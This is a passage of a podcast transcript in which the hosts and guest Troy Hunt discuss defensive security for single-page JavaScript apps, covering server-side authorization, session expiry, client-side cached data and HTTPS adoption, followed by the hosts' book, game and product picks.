Yeah. And it's funny actually. So, when I did the Angular course I originally didn't want to align it with a framework because in my mind, the vast majority of the security concerns are more about how the client is communicating with the server as opposed to what's happening within the client itself. And ultimately, all of these frameworks as neat as they are, they're just running script in the client. There are some very unique security paradigms to these frameworks. So, how do they do cross-site request forgery tokens? How do they do output encoding? But for the most part, it's about how do they communicate with the server in terms of the security implications? And in that regard, it's one of the first things I say in the Angular course. I'm going to use Angular to give you the examples but the same principles apply to every framework.

JOE:

So, one of the things that I heard recently when I was dealing with some routing issues was people saying, “Hey, you shouldn't even be doing or trying to figure out how to hide routes on the client. Instead you should have your server tell you that based on your user's authentication and authorization status, these are the menu options that they should see. These are the routes that they should see.” And so, the client never has a need for, “Hey, they can't go to this particular view or this page,” because it all comes from the server.

And again, being that this is advisory that's not by itself particularly secure. But do you have an opinion on that sort of a setup versus your more typical, “I've got everything down there but because you are not an admin, these particular routes, maybe they aren't visible just because we've hid the DOM elements but also if you try to go there you're going to get rejected. Then if you did happen to get there and you try to do the actual functionality the server wouldn't let you.”

TROY:

I think it comes back to the same point about if you take the client out of the picture altogether, are you satisfied with the way the app runs? And if the route exposes something of a nature that you don't want publicly visible, then you've got a problem.

For example if you have a template that might have some sensitive data in it, then okay, we can argue that probably shouldn't happen in the first place. [Chuckles] But hypothetically, then you've got to think about, “Alright, well do I need to have an authorization control on the server itself that actually protects that resource from being loaded in the first place?” And you can't just rely on what is then effectively obfuscation by the client simply not exposing it to an unauthenticated user. You've got to actually lock that resource down. Because before you know it, it gets indexed somewhere or it gets forcibly crawled or discovered in some other way. So yeah, go back to that point, take the client out of the picture, here are all the things that are accessible. Am I happy with that state?

JOE:

Okay. Now what about something like, this is another question that I recently was thinking about, and that is timeouts. Let's say you've got somebody. They're at a computer terminal. They're using your client-side single-page application, your React app, your Angular app. Their session, either they logout or their session just times out. Theoretically if somebody else got onto that computer and was really good with the DOM they might be able to show a view and actually look at data that was down there on the client, that they shouldn't normally have had access to.

TROY:

Yeah, good question. So, you mean data that might persist on the client post the end of the authenticated session?

JOE:

Right. Now, if they explicitly logout then maybe what you, to clean that up probably the best way I assume is just to refresh the page to get that data out of there, right? But if they don't click logout and their session just times out…

TROY:

Yeah, right. So, if you're not explicitly unloading things from the DOM then you might have an issue.

JOE:

Right.

TROY:

So, I guess the question then is, that logout call, is that actually going to explicitly flush things from the DOM, expire cache, do whatever it needs to do? Because that is kind of the assumption that you have to work on. And in fact, there are a couple of assumptions you got to work on. So, one is that if people logout they expect to then have anything discarded which might still be persistent about the session. The other assumption to work on is that people are just going to close the browser. So, they're not going to logout. They're going to go to the internet café, do their banking, and then just go, [inaudible] close the browser. And of course many browsers are just going to reopen with all the tabs [chuckles] reinstated. So, that's a little bit of a problem.

And then there's the other issue, and this is yes it's a user problem but you need to think about as a developer as well, is what happens when the user doesn't do anything? They just walk away from the machine and they leave it. And then we sort of start to talk about, okay well, should we have sessions that are just short-running, that expire after say 10 minutes of inactivity? Like your bank does. And then if we do something more like the Stack Overflow approach and we just stay authenticated for, almost for perpetuity it feels like, certainly for a month or so, does that pose a risk? And then that's going to be very case-by-case, right?

So, is my application the sort of application where we want really low friction for usage and there's a low-risk if someone else sits down at it? Or do we have one that's more in the finance space where there's a really high impact if someone else gains access to any of this information and we're happy to raise the bar for usability and actually make things a bit more difficult in order to improve security?

JOE:

Yeah, that's a good summation. What do you think people should be doing? Do you have a guideline on that? Or is it just case-by-case?

TROY:

Well, I think they should be consciously thinking about it [laughs] which is the first thing. And actually, that in itself is a broader theme. How many design decisions of the application security happen implicitly? So yeah, in the case like the duration of sessions, are you just going with the default of the application framework? Or are you saying, hey look, based on this particular application how long should we actually make this? Should we actually… is 20 minutes really the perfect solution for everybody? [Laughs] Or should it possibly be something else? And interestingly, you have to think about the places within an app where security is often implicit.

So, a really good example is password length. And I often say to people, “Alright so what's the minimum password length on your site?” And they'll say, “Well, it's eight characters.” And why is that? “Well, we've just always done it this way.” And it's really funny actually, because I was saying to people, what should it be? And they normally always either say six or eight or some other even number. And I haven't quite worked out why this is. But apparently password lengths should always be a minimum that is an even number. So, if anyone listening can figure out why [chuckles] it's always an even number…

JOE:

[Laughs]

TROY:

And oddly enough, the number of retries before locking out an account is always an odd number. It's always three or five. [Laughs]

JOE:

[Chuckles]

TROY:

So, if anyone, maybe a psychologist or something out there knows why that is, please let me know, because I'm pretty serious.

AIMEE:

I know some cases where it's not. [Laughs]

TROY:

[Chuckles]

AIMEE:

Not an odd number.

TROY:

Well, that would be interesting.

JOE:

So, some of these cases, especially [inaudible] like cached data on the client side, that has a lot to do with the framework that you use, right? Like, I don't know exactly how Angular or React might be holding onto my data. And I think with React it's a little bit more about how I decide to do it. But if I download some data and I have, you can say in Angular a scope variable that has data on it, is that accessible to somebody else after a user's session may have timed out or even after they click logout if I don't do anything specific? How do I find answers to those questions and figure that out? Especially if it takes somebody smarter or at least more familiar with crazy DOM hacking, the tools to determine if they can get to it. You don't always want to assume that I've got to be able to be as smart as any hacker and know all their tools. I just want to do what's right.

TROY:

Well, I think the first step is acknowledging that you need to know. [Laughs] This is really, really critical. Don't just trust that the framework would do everything that you think it should do. Figure out how it works. So, for something like the expiration of content, what is the actual implementation in the framework? A really easy way of testing this would be to say, let me open up two browser windows authenticated into the same resource on both. Let's logout of one of them and let's try and click around on the other one. Do I still have access to anything that might still be cached on the client? That would be a pretty rudimentary test.

But beyond that I would actually go and try and see, can you actually script in the console and access resources that you really shouldn't be able to once you've actually logged out of one of those other browser windows? So, you can test a lot of this and also use resources like Stack Overflow to ask these questions. There's also a security Stack Exchange that's quite useful to be able to post questions that nature on as well.

JOE:

Cool. One of the things we always like to ask, is there any particularly important topics that we haven't really discussed yet that should be discussed on the show?

TROY:

I think maybe one generally around security. And we touched on it very briefly, is that we are rushing forward as an industry to HTTPS everywhere. And increasingly good implementations of HTTPS. If you're starting a website today, just start the whole thing out over HTTPS. So, I recently did a blog for my wife, just a basic ghost blog. And we just went, alright day one, HTTPS. Because what we're starting to see is the browsers are holding people increasingly accountable for HTTPS. We're seeing Google use HTTPS as a ranking indicator. They'll actually up your SEO searchability if you've got HTTPS. We're seeing murmurs about browser vendors wanting to start flagging insecure connections, which is kind of what we're used to as the default position, but flagging them as insecure as opposed to just not flagging them as anything. So, now would be a really good time if you're building new stuff or revising existing stuff, just start moving the whole thing to a secure by default position. It's going to make your life a lot easier over the coming years.

JOE:

Cool, I like that. That's good advice. Alright well, if that's all that we've got I think we'll move onto picks. Aimee, are you ready to do your picks?

AIMEE:

Yeah. So, I don't have a lot this week but I did want to pick one. It is a GitHub account and it is, I'm going to have to put the link in the show notes because I'm not exactly sure how to pronounce this username. But it's just called awesome-react and they have… I think I picked a similar one for Angular a while back. But it's just a GitHub account with tons of different links to different conference videos and books and tutorials, pretty much everything you could want. So, that will be my pick this week.

JOE:

Awesome. Jamison, how about you?

JAMISON:

I have three picks. Doing some conference talk preparation and as is traditional I'm reading Dijkstra quotes because he's one of those people that you could just quote in every conference talk no matter what it's about. So, my pick is Dijkstra quotes. I don't know. He was like if Crockford was way smarter and less offensive but still equally grumpy. I think you'd either approach something like the tone that Dijkstra strikes in his quotes.

JOE:

[Laughs]

JAMISON:

He's just eminently quotable, just solid stuff.

My next pick is a blog post called 'Human Error and Blame Culture'. It's about an outage that happened at this Telecom company. And this person is analyzing the outage and the Telecom company's reaction to it. And they basically blamed it on a person. Like, the outage happened because this ops engineer person connected people to the wrong node or something. And he talks about how that kind of thinking can prevent you from fixing systemic problems that you have in your infrastructure. If you just say, “Well, someone made a mistake,” the question is why can one person make a mistake and bring down your whole infrastructure?

My last pick is a book called 'Infinite Jest' by David Foster Wallace. It's one of these prestige books. It's really thick. It's got a reputation for being hard to get through. But it's really funny. In a way it feels like a book written about today's internet culture even though it was written in 1996. Yeah, I've just been really enjoying it. It is a lot of work to get through but it feels worth it.

Those are my picks. Oh, I didn't mean to say that Douglas Crockford wasn't smart by the way. I'm just saying Dijkstra is smarter than he is. That wasn't an insult to Crockford. It was like Dijkstra is a super smart guy. Those are my picks.

AIMEE:

I don't think he listens anyway. [Laughs]

JAMISON:

Yeah, that's true. It's not like he's [inaudible]. It might offend AJ. AJ loves Crockford. That's all I got.

JOE:

Okay, awesome. So, I just want to key in on something you said about that book. That sounds a lot like, I know there's a book, something called like 'Black Box Diagnosis' or something like that. It talks about how the airline industry uses black boxes to fix their issues where they read what happens to the black box, figured out what happened, and they try to change the system; versus people or systems where they just try to blame a person and not fix the system.

JAMISON:

Oh, sure.

JOE:

And I guess in the book the story was a guy that, he was a pilot and his wife died to a medical error. And so, he was used to in the flight industry there's a big inquisition then they figure out, “Alright, how can we eliminate the possibility of this human error?” And in this case that's not what happens in the medical industry. So, he contrasts the airline industry and the medical industry.

So alright, I'll move ahead with my picks and then we'll have Troy's picks last. I want to make a couple of picks. The first one is a board game that I played called 'T.I.M.E. Stories'. And what's really cool about 'T.I.M.E. Stories' which right off the bat is going to sound not cool is the fact that you can only play the game once. And for a 50 or 60-dollar game, I can't remember exactly how much it was, I didn't buy it, my friend did, that seems like a counterintuitive thing, to buy a game that you can only play once. But the way that it works is it's like set up and then you buy modules. And I think the modules still aren't cheap. 20 or 30 dollars. But you sit down with three or four other people and you play through the game. And each time you play it's an entirely different game but you have to buy another set.

And it's sort of this story about your time traveling. Think maybe Assassin's Creed. You're time traveling in the back and you've got to figure out a mystery. But it's really difficult so we found… happened is we actually failed our first try. So, we'll replay the same scenario multiple times to try to succeed. So, there is some replayability to it, but it's only to try to… but once you've figured it out, then there's no real reason to play through the same scenario again. You have to buy a new scenario. Which again sounds at first like maybe that's not the greatest thing. But so far it's actually been really cool. I've been highly impressed with it.

We super enjoyed the time that we played together. It's a cooperative game where you're all working together trying to figure out the mystery. And it's a mystery-based game. So, on this first, the basic scenario that comes with the base game you're traveling back into the `1920s and you possess the bodies of inhabitants of an insane asylum trying to figure out some mystery that's going on at the insane asylum. And it's again, ala-Assassin's Creed for anybody who's played that. You go back and inhabit somebody else's body from the future. But super cool.

The other pick that I want to make is a not-pick. Like an anti-pick. I bought a really nice Razer gaming mouse. And the thing broke within six months. And for an 80-dollar mouse, I did not expect it to break within six months. Talked to some buddies and found out that this is actually a really common thing, that they tend to have problems with their mouse clicks. Tend to by default start double clicking whenever you press them once after a while. There's something faulty in there. So, I ended up buying what he recommended which is a ROCCAT, R-O-C-C-A-T, mouse. And he says that he's had better experiences with that. I haven't had any. I've only had this mouse for like a month. But I like having a nice, solid mouse that maybe has a little bit of programmability into it, macros in it for gaming. And I was really disappointed that my Razer mouse blew up on me so quickly.

So, those are my picks. Troy, how about you?

TROY:

Let me give you a couple. I'll give you one from someone else and then one from me. So, I got a good book. In fact it was a couple of years ago now but it's still one of my favorite security-oriented books. It's called 'We Are Anonymous'. It's from a lady called Parmy Olson. And it was just a really, really interesting book about some of the hacktivist folks a few years ago, particularly from the likes of LulzSec. And she interviewed a bunch of them after some of them were arrested as well. And it's just a very interesting insight into what makes these people tick. And it wasn't written as a

hardcore security book. It was one I actually really enjoyed sitting down and reading and one of those books you just want to keep picking up [chuckles] and going back to. So, 'We Are Anonymous' by Parmy Olson is one from someone else.

One from me that people might find useful, I run a little project called 'Have I Been pwned?', HaveIBeenPwned.com, which aggregates data breaches. So, there are about 70 [odd] data breaches in there. I've got about 300 million records from various breaches where you can search for your exposure and see where you've been impacted. So, I've been in the Adobe data breach. I mentioned Patreon before, a couple of others. One thing that folks on this call might find particularly interesting is there's a free API. So, if someone would like to build awesome stuff and awesome apps that use these large-scale data breaches in order to do something good [chuckles] then please go and use the API. There's no registration or auth or rate-limiting or anything like that. Just go nuts. It's on Azure. Magic will happen. Stuff will scale. [Laughs] And if you do something cool, let me know and I'll give it a plug. So, go and have a good play with it, folks.

JOE:

Excellent. I love that URL by the way, domain name. It's an awesome domain name.

TROY:

The best bit is when it's in French media and hearing the French pronounce it. It's awesome. [Chuckles]

JOE:

Oh really? {Laughs] That sounds like it. Well, thanks again for being on our show.

JAMISON:

Yeah, thank you.

JOE:

We really appreciate the time.

TROY:

No worries, guys. It's a pleasure.

JOE:

It was a great discussion and thanks everybody for listening in. And we will be back next week.

[Hosting and bandwidth provided by the Blue Box Group. Check them out at BlueBox.net.]

[Bandwidth for this segment is provided by CacheFly, the world’s fastest CDN. Deliver your content fast with CacheFly. Visit CacheFly.com to learn more.]

[Do you wish you could be part of the discussion on JavaScript Jabber? Do you have a burning question for one of our guests? Now you can join the action at our membership forum. You can sign up at
JavaScriptJabber.com and there you can join discussions with the regular panelists and our guests.]

Album Art
201 JSJ Security with Troy Hunt
0:00
1:07:26
Playback Speed: